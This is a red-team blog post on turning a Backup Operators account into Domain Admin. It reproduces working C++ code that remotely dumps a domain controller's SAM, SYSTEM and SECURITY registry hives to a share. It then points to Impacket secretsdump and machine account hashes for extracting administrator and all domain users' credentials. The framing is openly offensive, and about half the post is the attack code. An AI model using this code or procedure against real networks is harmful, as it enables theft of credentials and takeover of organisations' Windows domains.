Backup Operator to Domain Admin

B3R-SEC

2022-02-19

redteamops

Backup Operators -> Domain Admin

User management is a huge issue for enterprise tech staffs. There is alot of user to manage like local machine users, service users, domain admins, backup users etc.

An attacker, If you get any priviledge user’s password or NT/LM hash, you can take the domain of company.

In this article, I will handle users who has member of Backup Operators group.

Normally, tech staff uses Backup Operators group for takes backup of files, folders etc. Here is the a backup operator user;

As you see the user only member of Domain Users and Backup Operators. So, this user can access only access the machine locally and read files and folders.

https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/active-directory-security-groups#bkmk-backupoperators

Let’s imagine, as an attacker has this user’s password as clear-text or NT/LM hash. We can read any files or folders on any machines that in domain. (Evil laugh)

We can also access the SAM, SYSTEM and SECURITY files on the machine. That’s the point..

We can use below solution for dump SAM, SYSTEM and SECURITY files of Domain Controller server and write them on any remote share.

https://github.com/mpgn/BackupOperatorToDA

When you check the BackupOperatorToDA.cpp file; RegConnectRegistryW is help us to access registery remotely. Thus, we can access SAM, SYSTEM and SECURITY registry values. Easy!

void exploit() {

	HKEY hklm;
	HKEY hkey;
	DWORD result;

	const char* hives[] = { "SAM","SYSTEM","SECURITY" };

	result = RegConnectRegistryA(target, HKEY_LOCAL_MACHINE, &hklm);
	if (result != 0) {
		printf("RegConnectRegistryW: %d\n", result);
		exit(0);
	}
	for (int i = 0; i < 3; i++) {
		printf("Dumping %s hive to %s\n", hives[i], std::string(path).append(hives[i]).c_str());
		result = RegOpenKeyExA(hklm, hives[i], REG_OPTION_BACKUP_RESTORE | REG_OPTION_OPEN_LINK, KEY_READ, &hkey);
		if (result != 0) {
			printf("RegOpenKeyExA: %d\n", result);
			exit(0);
		}
		result = RegSaveKeyA(hkey, std::string(path).append(hives[i]).c_str(), NULL);
		if (result != 0) {
			printf("RegSaveKeyA: %d\n", result);
			exit(0);
		}
	}
}

Let’s run.

Perfect ! We have already access to \\ACMEDC\C$ drive and get these files on our local and let’s read SAM file !

Impacket - secretsdump is perfect tools for read SAM file.

As you see, We have Administrator user of ACME domain. If default Administrator user is disable ?!

As an attacker, We have already multiple attack vector.

We can use $MACHINE.ACC hash for getting all users of ACME domain via ACMEDC.

Cheers !